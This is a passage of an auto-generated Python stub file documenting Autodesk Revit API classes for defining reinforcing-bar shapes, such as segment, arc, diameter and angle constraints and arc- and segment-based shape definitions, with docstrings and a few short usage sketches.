__enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class RebarShapeConstraintAngleFromFixedDir(RebarShapeConstraint, IDisposable): """ A constraint which can be applied to a RebarShapeSegment and drives the angle of the segment relative to a fixed direction in UV-space. RebarShapeConstraintAngleFromFixedDir(paramId: ElementId, sign: int, direction: UV) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, sign, direction): """ __new__(cls: type, paramId: ElementId, sign: int, direction: UV) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A fixed direction in UV-space. The parameter will drive the segment's angle relative to this direction. Get: Direction(self: RebarShapeConstraintAngleFromFixedDir) -> UV Set: Direction(self: RebarShapeConstraintAngleFromFixedDir) = value """ Sign = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """When the sign is 1, the Direction is rotated clockwise by the angle's value. When -1, the Direction is rotated counter-clockwise. Get: Sign(self: RebarShapeConstraintAngleFromFixedDir) -> int Set: Sign(self: RebarShapeConstraintAngleFromFixedDir) = value """ class RebarShapeConstraintArcLength(RebarShapeConstraint, IDisposable): """ An arc-length constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintArcLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintChordLength(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeDefinitionByArc and drives the straight distance between the arc endpoints. 
RebarShapeConstraintChordLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintCircumference(RebarShapeConstraint, IDisposable): """ A circumference constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintCircumference(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the diameter. Get: ArcReferenceType(self: RebarShapeConstraintCircumference) -> RebarShapeArcReferenceType """ class RebarShapeConstraintDiameter(RebarShapeConstraint, IDisposable): """ A diameter constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintDiameter(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the diameter. Get: ArcReferenceType(self: RebarShapeConstraintDiameter) -> RebarShapeArcReferenceType """ class RebarShapeConstraintFixedSegmentDir(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeSegment and fixes the direction of the segment in UV-space. RebarShapeConstraintFixedSegmentDir(dir: UV) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, dir): """ __new__(cls: type, dir: UV) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The direction of the RebarShapeSegment in UV-space. Get: Direction(self: RebarShapeConstraintFixedSegmentDir) -> UV Set: Direction(self: RebarShapeConstraintFixedSegmentDir) = value """ class RebarShapeConstraintProjectedSegmentLength(RebarShapeConstraint, IDisposable): """ A constraint that measures the length of a segment as measured by projecting onto a direction that is not parallel to the segment. RebarShapeConstraintProjectedSegmentLength(paramId: ElementId, direction: UV, tripleProductSign: int, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def GetSegmentEndReferenceType(self, index): """ GetSegmentEndReferenceType(self: RebarShapeConstraintProjectedSegmentLength, index: int) -> RebarShapeSegmentEndReferenceType Choice of two possibilities for the start and end references of the length constraint. index: Which reference on the constraint. Either 0 or 1. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, direction, tripleProductSign, refType0, refType1): """ __new__(cls: type, paramId: ElementId, direction: UV, tripleProductSign: int, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ pass Direction = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """A vector specifying the direction of the constraint. The direction is fixed, and the shape is always constructed so that the segment direction has a positive dot product with this vector. Get: Direction(self: RebarShapeConstraintProjectedSegmentLength) -> UV """ TripleProductSign = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Sign of the z-coordinate of the cross product of the Direction property with the segment vector. TripleProductSign is 1 if the segment direction is to be on the left of the constraint direction, or -1 if the segment direction is to be on the right. Get: TripleProductSign(self: RebarShapeConstraintProjectedSegmentLength) -> int """ class RebarShapeConstraintRadius(RebarShapeConstraint, IDisposable): """ A radius constraint associated with an arc in a RebarShapeDefinition. RebarShapeConstraintRadius(paramId: ElementId, refType: RebarShapeArcReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType): """ __new__(cls: type, paramId: ElementId, refType: RebarShapeArcReferenceType) """ pass ArcReferenceType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The choice of rule for measuring the radius. Get: ArcReferenceType(self: RebarShapeConstraintRadius) -> RebarShapeArcReferenceType """ class RebarShapeConstraintSagittaLength(RebarShapeConstraint, IDisposable): """ A constraint that can be applied to a RebarShapeDefinitionByArc and drives the height of the arc. RebarShapeConstraintSagittaLength(paramId: ElementId) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
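# Usage sketch: constructing constraint objects for a rebar shape definition. The
# parameter ids `arc_len_param` and `diam_param` are assumed to be ElementIds of
# shared shape parameters (see RebarShapeParameters.GetElementIdForExternalDefinition
# below); attaching the constraints to a RebarShapeDefinition subclass is not shown here.
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import UV
from Autodesk.Revit.DB.Structure import (RebarShapeArcReferenceType,
    RebarShapeConstraint180DegreeDefaultBend, RebarShapeConstraintArcLength,
    RebarShapeConstraintDiameter, RebarShapeConstraintFixedSegmentDir)

length = RebarShapeConstraintArcLength(arc_len_param)                         # drives an arc's length
diameter = RebarShapeConstraintDiameter(diam_param,
                                        RebarShapeArcReferenceType.External)  # out-to-out diameter
horizontal = RebarShapeConstraintFixedSegmentDir(UV(1.0, 0.0))                # pin a segment to +U
u_turn = RebarShapeConstraint180DegreeDefaultBend()                           # radius taken from the bar type
print(diameter.ArcReferenceType, diameter.GetParamId())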
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId): """ __new__(cls: type, paramId: ElementId) """ pass class RebarShapeConstraintSegmentLength(RebarShapeConstraint, IDisposable): """ A constraint that controls the length of a segment. RebarShapeConstraintSegmentLength(paramId: ElementId, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ def Dispose(self): """ Dispose(self: RebarShapeConstraint, A_0: bool) """ pass def GetSegmentEndReferenceType(self, index): """ GetSegmentEndReferenceType(self: RebarShapeConstraintSegmentLength, index: int) -> RebarShapeSegmentEndReferenceType Choice of two possibilities for the start and end references of the length constraint. index: Which reference on the constraint. Either 0 or 1. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeConstraint, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, paramId, refType0, refType1): """ __new__(cls: type, paramId: ElementId, refType0: RebarShapeSegmentEndReferenceType, refType1: RebarShapeSegmentEndReferenceType) """ pass class RebarShapeDefinition(object, IDisposable): """ A class to assist in defining rebar shapes. A RebarShape element needs exactly one RebarShapeDefinition. """ def AddFormulaParameter(self, paramId, formula): """ AddFormulaParameter(self: RebarShapeDefinition, paramId: ElementId, formula: str) Add a formula-driven parameter to the shape definition. paramId: The parameter. To obtain the id of a shared parameter, call RebarShapeParameters.GetElementIdForExternalDefinition. formula: The formula expressed as a string. The string is exactly what a user would type into the Family Types dialog, e.g. "Total Length*3.14159*(Bar Diameter/2)*(Bar Diameter/2)" """ pass def AddParameter(self, paramId, defaultValue): """ AddParameter(self: RebarShapeDefinition, paramId: ElementId, defaultValue: float) Add a parameter to the shape definition. paramId: The parameter. To obtain the id of a shared parameter, call RebarShapeParameters.GetElementIdForExternalDefinition. defaultValue: A default value for this parameter in shapes. The default values should be chosen carefully, because they are required to be consistent as a set of constraints. """ pass def CheckDefaultParameterValues(self, bendRadius, barDiameter): """ CheckDefaultParameterValues(self: RebarShapeDefinition, bendRadius: float, barDiameter: float) -> bool Check that the shape can be solved with the default parameter values. bendRadius: A value for the Bend Radius parameter. Zero is allowed. barDiameter: A value for the Bar Diameter parameter. Zero is allowed. Returns: True if the rebar can be solved with the default parameter values and the given bend radius and bar diameter; false if it cannot. 
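# --- Illustrative usage sketch (not part of the generated stub) --------------
# Shows how the constraint classes documented above can be constructed before
# being attached to a segment or definition. `doc` is assumed to be an open
# Autodesk.Revit.DB.Document and `length_def` a Length-type shared-parameter
# ExternalDefinition; both names are hypothetical.
def _example_build_length_constraints(doc, length_def):
    param_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, length_def)
    # Measure the segment between the straight portions at both of its ends.
    segment_length = RebarShapeConstraintSegmentLength(
        param_id,
        RebarShapeSegmentEndReferenceType.Straight,
        RebarShapeSegmentEndReferenceType.Straight)
    # Drive the height of an arc-based definition with the same parameter.
    sagitta = RebarShapeConstraintSagittaLength(param_id)
    return segment_length, sagitta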
""" pass def Dispose(self): """ Dispose(self: RebarShapeDefinition) """ pass def GetParameterDefaultValue(self, paramId): """ GetParameterDefaultValue(self: RebarShapeDefinition, paramId: ElementId) -> float Return the parameter's default value as stored in the definition. paramId: Id of a parameter in the definition. Returns: The parameter value. """ pass def GetParameterFormula(self, paramId): """ GetParameterFormula(self: RebarShapeDefinition, paramId: ElementId) -> str Return the parameter's formula, if one is associated with it. paramId: Id of a parameter in the definition. Returns: The formula, or an empty string if there is no formula for the parameter. """ pass def GetParameters(self): """ GetParameters(self: RebarShapeDefinition) -> IList[ElementId] Return the Ids of the shared parameters in the Definition. Returns: List of parameters as ElementIds. """ pass def HasParameter(self, paramId): """ HasParameter(self: RebarShapeDefinition, paramId: ElementId) -> bool Whether the definition stores the parameter. paramId: Id of a parameter. Returns: True if the definition stores the parameter, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def RemoveParameter(self, paramId): """ RemoveParameter(self: RebarShapeDefinition, paramId: ElementId) Remove the parameter from the definition. paramId: Id of a parameter in the definition. """ pass def SetParameterDefaultValue(self, paramId, value): """ SetParameterDefaultValue(self: RebarShapeDefinition, paramId: ElementId, value: float) Change the parameter's value as stored in the definition. paramId: Id of a parameter in the definition. value: New value for the parameter. """ pass def SetParameterFormula(self, paramId, formula): """ SetParameterFormula(self: RebarShapeDefinition, paramId: ElementId, formula: str) Associate a formula with the parameter. paramId: Id of a parameter in the definition. formula: The formula expressed as a string. The string is exactly what a user would type into the Family Types dialog, e.g. "Total Length*3.14159*(Bar Diameter/2)*(Bar Diameter/2)" """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Complete = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Report whether the shape definition is fully constrained. Get: Complete(self: RebarShapeDefinition) -> bool """ IsPlanar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Reports whether the shape definition lies within a plane: false if a spiral, true in all other cases. Get: IsPlanar(self: RebarShapeDefinition) -> bool """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. 
Get: IsValidObject(self: RebarShapeDefinition) -> bool """ class RebarShapeDefinitionByArc(RebarShapeDefinition, IDisposable): """ Definition of a shape whose size and position can determined by a single arc. RebarShapeDefinitionByArc(doc: Document, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) RebarShapeDefinitionByArc(doc: Document, type: RebarShapeDefinitionByArcType) """ def AddConstraintArcLength(self, paramId): """ AddConstraintArcLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the arc length of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def AddConstraintChordLength(self, paramId): """ AddConstraintChordLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the chord length (the straight-line distance between the endpoints of the arc). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def AddConstraintCircumference(self, paramId, arcRefType): """ AddConstraintCircumference(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the circumference of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify along which circle the circumference is measured--to the interior of the bar, the centerline, or the exterior. """ pass def AddConstraintDiameter(self, paramId, arcRefType): """ AddConstraintDiameter(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the diameter of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify how the diameter should be measured--to the interior of the bend, the centerline of the bar, or the exterior. """ pass def AddConstraintRadius(self, paramId, arcRefType): """ AddConstraintRadius(self: RebarShapeDefinitionByArc, paramId: ElementId, arcRefType: RebarShapeArcReferenceType) Specify a parameter to drive the radius of the shape. paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). arcRefType: Specify how the radius should be measured--to the interior of the bend, the centerline of the bar, or the exterior. """ pass def AddConstraintSagittaLength(self, paramId): """ AddConstraintSagittaLength(self: RebarShapeDefinitionByArc, paramId: ElementId) Specify a parameter to drive the sagittal length (the height of the circular segment, measured perpendicular to the chord). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). """ pass def Dispose(self): """ Dispose(self: RebarShapeDefinition, A_0: bool) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeDefinitionByArc) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this definition. Returns: The list of constraints. 
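# --- Illustrative usage sketch (not part of the generated stub) --------------
# Building a definition driven by a single arc. `arc_ref_type` stands for a
# RebarShapeArcReferenceType value choosing whether the dimension is measured
# to the interior of the bar, its centerline, or its exterior; all other names
# are hypothetical placeholders.
def _example_arc_definition(doc, diameter_def, arc_ref_type):
    d_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, diameter_def)
    by_arc = RebarShapeDefinitionByArc(doc, RebarShapeDefinitionByArcType.Arc)
    by_arc.AddParameter(d_id, 1.0)
    by_arc.AddConstraintDiameter(d_id, arc_ref_type)
    # Further constraints (e.g. AddConstraintArcLength) may be needed before
    # the inherited Complete property reports True.
    return by_arc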
""" pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def SetArcTypeSpiral(self, height, pitch, baseFinishingTurns, topFinishingTurns): """ SetArcTypeSpiral(self: RebarShapeDefinitionByArc, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) Set the RebarShapeDefinitionByArc.Type property to Spiral. height: The height of the spiral (assuming the spiral is vertical). pitch: The pitch, or vertical distance traveled in one rotation. baseFinishingTurns: The number of finishing turns at the lower end of the spiral. topFinishingTurns: The number of finishing turns at the upper end of the spiral. """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeDefinitionByArc, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, doc, *__args): """ __new__(cls: type, doc: Document, height: float, pitch: float, baseFinishingTurns: int, topFinishingTurns: int) __new__(cls: type, doc: Document, type: RebarShapeDefinitionByArcType) """ pass Type = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Among those rebar shapes defined by an arc, specify which kind. Get: Type(self: RebarShapeDefinitionByArc) -> RebarShapeDefinitionByArcType Set: Type(self: RebarShapeDefinitionByArc) = value """ class RebarShapeDefinitionByArcType(Enum, IComparable, IFormattable, IConvertible): """ A RebarShapeDefinitionByArc takes one of three forms. enum RebarShapeDefinitionByArcType, values: Arc (0), LappedCircle (1), Spiral (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Arc = None LappedCircle = None Spiral = None value__ = None class RebarShapeDefinitionBySegments(RebarShapeDefinition, IDisposable): """ Definition of a shape in terms of one or more straight segments of rebar, with arc bends between the segments. 
RebarShapeDefinitionBySegments(doc: Document, numberOfSegments: int) """ def AddBendDefaultRadius(self, vertexIndex, turn, angle): """ AddBendDefaultRadius(self: RebarShapeDefinitionBySegments, vertexIndex: int, turn: RebarShapeVertexTurn, angle: RebarShapeBendAngle) Specify a default-radius bend. vertexIndex: Index of the vertex (1 to NumberOfVertices - 2). turn: Specify turn direction (RebarShapeVertexTurn::Left or RebarShapeVertexTurn::Right). angle: Specify whether the bend is acute, obtuse, etc. """ pass def AddBendVariableRadius(self, vertexIndex, turn, angle, paramId, measureIncludingBarThickness): """ AddBendVariableRadius(self: RebarShapeDefinitionBySegments, vertexIndex: int, turn: RebarShapeVertexTurn, angle: RebarShapeBendAngle, paramId: ElementId, measureIncludingBarThickness: bool) Specify a variable-radius bend. vertexIndex: Index of the vertex (1 to NumberOfVertices - 2). turn: Specify turn direction (RebarShapeVertexTurn::Left or RebarShapeVertexTurn::Right). angle: Specify whether the bend is acute, obtuse, etc. paramId: Id of a parameter driving the radius. measureIncludingBarThickness: If true, the radius is measured to the outside of the bend; if false, it is measured to the inside. """ pass def AddConstraintParallelToSegment(self, iSegment, paramId, measureToOutsideOfBend0, measureToOutsideOfBend1): """ AddConstraintParallelToSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, measureToOutsideOfBend0: bool, measureToOutsideOfBend1: bool) Constrain the length of a segment by parameterizing its length. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). measureToOutsideOfBend0: Choose between two possibilities for the first reference of the length dimension. If false, the reference is at the point where the bend begins; equivalently, at the projection of the bend centerpoint onto the segment. If true, the reference is moved outward by a distance equal to the bend radius plus the bar diameter; if the bend is a right angle or greater, this is equivalent to putting the reference at the outer face of the bend. measureToOutsideOfBend1: Choose between two possibilities for the second reference of the length dimension. """ pass def AddConstraintToSegment(self, iSegment, paramId, constraintDirCoordX, constraintDirCoordY, signOfZCoordOfCrossProductOfConstraintDirBySegmentDir, measureToOutsideOfBend0, measureToOutsideOfBend1): """ AddConstraintToSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, signOfZCoordOfCrossProductOfConstraintDirBySegmentDir: int, measureToOutsideOfBend0: bool, measureToOutsideOfBend1: bool) Add a constraint that helps determine the length of a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the constraint. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. signOfZCoordOfCrossProductOfConstraintDirBySegmentDir: Legal values are 1 and -1. For a fixed-direction segment, this value is ignored. 
For a variable-direction segment, this value is combined with the constraint length (the nonnegative value associated with 'param') to determine the direction of the segment. For example, a segment whose direction vector lies in the upper-right quadrant of the plane, and whose x-axis projected length is A and whose y-axis projected length is B, could be created by calling: AddConstraintToSegment(iSegment, paramA, 1.0, 0.0, 1, ...) AddConstraintToSegment(iSegment, paramB, 0.0, 1.0, -1, ...) measureToOutsideOfBend0: Choose between two possibilities for the first reference of the length dimension. If false, the reference is at the point where the bend begins; equivalently, at the projection of the bend centerpoint onto the segment. If true, the reference is moved outward by a distance equal to the bend radius plus the bar diameter; if the bend is a right angle or greater, this is equivalent to putting the reference at the outer face of the bend. measureToOutsideOfBend1: Choose between two possibilities for the second reference of the length dimension. """ pass def AddListeningDimensionBendToBend(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iEnd0, iSegment1, iEnd1): """ AddListeningDimensionBendToBend(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iEnd0: int, iSegment1: int, iEnd1: int) Specify a dimension between two bends, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iEnd0: End (0 or 1) of the first segment. iSegment1: Index of the second segment (0 to NumberOfSegments - 1). iEnd1: End (0 or 1) of the second segment. """ pass def AddListeningDimensionSegmentToBend(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iSegment1, iEnd1): """ AddListeningDimensionSegmentToBend(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iSegment1: int, iEnd1: int) Specify a dimension perpendicular to one fixed-direction segment, referring to that segment and some other bend in the shape, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iSegment1: Index of the second segment (0 to NumberOfSegments - 1). iEnd1: End (0 or 1) of the second segment. """ pass def AddListeningDimensionSegmentToSegment(self, paramId, constraintDirCoordX, constraintDirCoordY, iSegment0, iSegment1): """ 